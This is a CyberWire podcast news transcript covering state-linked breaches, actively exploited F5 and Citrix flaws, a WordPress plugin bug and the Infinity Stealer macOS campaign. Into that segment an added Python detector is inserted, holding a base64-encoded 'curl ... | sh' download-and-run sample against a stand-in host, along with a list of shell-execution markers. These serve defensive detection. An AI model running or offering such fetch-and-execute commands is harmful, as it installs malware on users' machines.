The CyberWire Daily Podcast 3.30.26
Ep 2519 | 3.30.26

Inbox intrusion hits FBI chief.

Transcript

Iran-linked hackers claim a breach of the FBI director’s personal email. ShinyHunters hit the European Commission. F5 and Citrix warn of actively exploited flaws. A WordPress plugin exposes hundreds of thousands of sites. Infinity Stealer targets macOS users. A Russian APT adopts a new iOS exploit kit. Treasury weighs a cyber insurance backstop. DHS clears suspended CISA staff. Our guest is Brian Long, CEO and Co-Founder of Adaptive Security, discussing deepfake job hires and the new identity attack surface. Bureaucrats bless a black-box behemoth.

Today is Monday, March 30th, 2026. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

Iran-linked hackers claim breach of the FBI director’s personal email.

Iran-linked hackers calling themselves Handala Hack Team claim they breached FBI Director Kash Patel’s personal Gmail account and published photos and more than 300 emails online. The FBI confirmed the account was targeted but said the material was historical and contained no government information. Reuters could not independently verify the emails, though the address matches one previously tied to Patel in earlier breaches.

Handala, widely assessed by Western researchers as a front for Iranian cyberintelligence activity, has recently claimed additional attacks, including against medical device firm Stryker and alleged data exposure involving Lockheed Martin employees. Analysts say the Patel leak fits a broader Iranian strategy to embarrass U.S. officials and signal reach during ongoing tensions with the United States and Israel.

Such intrusions into officials’ personal accounts are not unusual and resemble earlier incidents involving senior U.S. figures. Intelligence assessments suggest Iran may continue low-level cyber operations as part of retaliatory pressure.

ShinyHunters breach the European Commission.

The European Commission confirmed a data breach affecting its Europa.eu web platform after an attack claimed by the ShinyHunters extortion group. Investigators say at least one Amazon Web Services account tied to the platform was compromised, though internal Commission systems were not affected and public websites remained operational. Officials believe some data was taken and are notifying potentially impacted EU entities while continuing to assess the scope of the incident.

ShinyHunters claims it stole more than 350 GB of data, including databases, mail server content, contracts, and other sensitive files, and has posted a 90 GB archive on its leak site. The Commission has not verified the full extent of these claims but says it is monitoring the situation and strengthening security measures.

F5 Networks highlights an actively exploited vulnerability.

F5 Networks has upgraded the severity of vulnerability CVE-2025-53521 in its BIG-IP Access Policy Manager (APM) from a denial-of-service flaw to a critical remote code execution (RCE) issue, warning it is actively exploited to deploy webshells on unpatched systems. The bug allows unauthenticated attackers to execute code on affected devices configured with access policies on virtual servers. F5 says earlier patches still address the risk but urges organizations to review logs, disks, and terminal histories for signs of compromise.

The U.S. Cybersecurity and Infrastructure Security Agency added the flaw to its catalog of actively exploited vulnerabilities and ordered federal agencies to secure systems immediately. With more than 240,000 BIG-IP instances exposed online, the vulnerability presents a significant enterprise risk.

Citrix NetScaler vulnerabilities are under active exploitation.

Security researchers have confirmed active exploitation of CVE-2026-3055, a critical vulnerability in Citrix NetScaler ADC and NetScaler Gateway that can allow unauthenticated attackers to leak sensitive memory data. The flaw affects only customer-managed systems configured as SAML Identity Providers. Honeypot telemetry from watchTowr and Defused observed attackers sending crafted SAML requests to trigger data exposure. Citrix and agencies including the UK’s National Cyber Security Centre urge immediate patching, warning that exploitation began within days of disclosure and is ongoing in the wild.

A popular WordPress plugin exposes over 800,000 websites.

A vulnerability in the Smart Slider 3 WordPress plugin, installed on more than 800,000 websites, allows authenticated users with subscriber-level access to read arbitrary files from affected servers. Tracked as CVE-2026-3098, the flaw stems from missing capability and file validation checks in the plugin’s AJAX export function, enabling access to sensitive files such as wp-config.php, which contains database credentials and cryptographic keys. Although rated medium severity because authentication is required, the issue poses significant risk for sites with user accounts. The bug affects versions through 3.5.1.33 and was patched in version 3.5.1.34. Researchers estimate roughly 500,000 sites may still be vulnerable. No active exploitation has been confirmed, but administrators are urged to update promptly.

Infinity Stealer targets macOS through ClickFix.

Infinity Stealer is a newly identified macOS information-stealing malware delivered through a fake Cloudflare CAPTCHA using the ClickFix social-engineering technique. Victims are prompted to paste a base64-encoded curl command into Terminal, which installs a Python-based payload compiled into a native macOS binary using the Nuitka compiler. According to Malwarebytes, this marks the first observed campaign combining ClickFix delivery with a Nuitka-compiled macOS infostealer.
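As an added illustration that is not part of the episode or of the Malwarebytes research: a small Python heuristic a defender might run over shell-history or process-audit lines to flag the pattern described above, a base64 token that decodes to a curl command and is piped straight into a shell. The command lines, the decoded payload and its example.invalid URL are constructed for this example, not indicators from the campaign.

```python
import base64
import re
import shlex

# Constructed sample command lines (not real indicators), as a defender might
# see them in shell history or a process-audit log. Two mimic the ClickFix
# pattern: a base64 blob decoded on the fly and piped into a shell.
PAYLOAD_B64 = base64.b64encode(b"curl -fsSL http://example.invalid/x | sh").decode()
SAMPLE_LOG = [
    "ls -la ~/Downloads",
    f"echo {PAYLOAD_B64} | base64 -d | bash",
    "git status",
    f"echo '{PAYLOAD_B64}' | base64 --decode | sh",
    "echo aGVsbG8gd29ybGQh | base64 -d",  # decodes to a harmless 'hello world!'
]

B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
DECODE_STEP = re.compile(r"base64\s+(?:-d|-D|--decode)\b")
SHELL_SINK = re.compile(r"\|\s*(?:sh|bash|zsh)\b")
# Markers that make a decoded payload worth an alert (download or execution).
SUSPICIOUS = ("curl ", "wget ", "| sh", "| bash", "osascript")

def decode_base64_tokens(line: str) -> list[str]:
    """Return the UTF-8 text of every base64-looking token in a command line."""
    try:
        tokens = shlex.split(line)
    except ValueError:  # unbalanced quotes: fall back to whitespace splitting
        tokens = line.split()
    decoded = []
    for tok in tokens:
        if not B64_TOKEN.match(tok):
            continue
        try:
            decoded.append(base64.b64decode(tok, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or binary content: skip
    return decoded

def classify(line: str) -> str:
    """Label one command line: 'clickfix-like', 'encoded-command' or 'benign'."""
    decoded = decode_base64_tokens(line)
    payload_hits = any(m in text for text in decoded for m in SUSPICIOUS)
    if payload_hits and DECODE_STEP.search(line) and SHELL_SINK.search(line):
        return "clickfix-like"
    return "encoded-command" if decoded else "benign"

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(f"{classify(line):16} {line}")
```

Only the 'clickfix-like' verdict combines all three signals (decodable blob, decode step, shell sink); 'encoded-command' is a lower-confidence hint worth a look rather than an alert.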

Once installed, the malware performs anti-analysis checks and steals browser credentials, macOS Keychain data, cryptocurrency wallets, screenshots, and developer secrets before exfiltrating them to command-and-control infrastructure. Researchers say the native binary format complicates detection and analysis, highlighting increasingly sophisticated threats targeting macOS users.

Researchers say a Russian APT has adopted the DarkSword iOS exploit kit.

Russian state-linked threat group Star Blizzard has adopted the DarkSword iOS exploit kit in a new campaign targeting Apple devices and iCloud accounts, according to Proofpoint. The activity, observed March 26, used Atlantic Council-themed phishing emails sent from compromised accounts and marked a shift to link-based delivery. Evidence suggests the group is using DarkSword for credential harvesting and intelligence collection. Targets included government, financial, legal, academic, and think tank organizations, indicating expanded operational scope.

The Treasury Department ponders a cyber insurance backstop.

The U.S. Treasury Department is seeking public comment on whether catastrophic cyber incidents should qualify for coverage under the Terrorism Risk Insurance Program (TRIP), signaling renewed debate over a possible federal cyber insurance backstop. Originally created after 9/11, TRIP supports insurers facing large terrorism-related losses, but cyberattacks remain difficult to classify under the program due to challenges around attribution, intent, and scale.

Officials are examining whether this ambiguity leaves critical infrastructure operators exposed to major cyber disruptions that private insurers may not be able to absorb. Researchers say discussions remain exploratory, with no immediate policy changes expected, even as cyber risks continue to grow.

Experts warn that events such as large cloud outages or attacks on power grids could exceed current insurance limits. Insurers often structure policies to avoid correlated, systemic losses, increasing concern that a severe cyber incident could create economic damage beyond what the private market can cover.

DHS ends its investigation into CISA staff.

The Department of Homeland Security has ended an investigation into seven Cybersecurity and Infrastructure Security Agency staff members who were placed on leave after arranging a counterintelligence polygraph exam that former acting CISA Director Madhu Gottumukkala failed in July 2025. Officials said the probe was closed about a week ago and the staff were cleared of wrongdoing. At least five career employees and one contractor had their security clearances suspended following their involvement in scheduling or approving the exam, which was required for access to a sensitive intelligence program. Lawmakers on the House Homeland Security Committee welcomed the decision, calling the action a correction after employees were penalized for performing their duties. It remains unclear whether all affected staff will return, and CISA continues to operate without permanent leadership.

Bureaucrats bless a black-box behemoth.

In late 2024, federal cybersecurity reviewers examined Microsoft’s Government Community Cloud High and came away with what might politely be called concerns, and less politely something closer to despair. According to ProPublica, after years of requesting basic documentation about how sensitive data moves and is encrypted inside the system, reviewers still lacked enough visibility to judge its security posture with confidence. Unfortunately for everyone involved, the product was already widely deployed across agencies like Justice and Energy, making rejection awkwardly impractical.

So FedRAMP authorized it anyway, attaching what amounted to a “proceed with caution” label and hoping for the best. The decision followed years of incomplete diagrams, stalled reviews, and mounting pressure from agencies already committed to the platform. Critics now warn the process looks less like rigorous oversight and more like paperwork theater, especially as staffing cuts leave fewer people around to verify what, exactly, was approved in the first place.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com.

We’re proud that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K helps cybersecurity professionals and organizations grow, learn, and stay ahead. We’re the nexus for discovering the people, tech, and ideas shaping the industry. Learn how at n2k.com.

N2K’s lead producer is Liz Stokes. We’re mixed by Tré Hester, with original music and sound design by Elliott Peltzman. Our contributing host is Maria Varmazis. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher. And I’m Dave Bittner. Thanks for listening.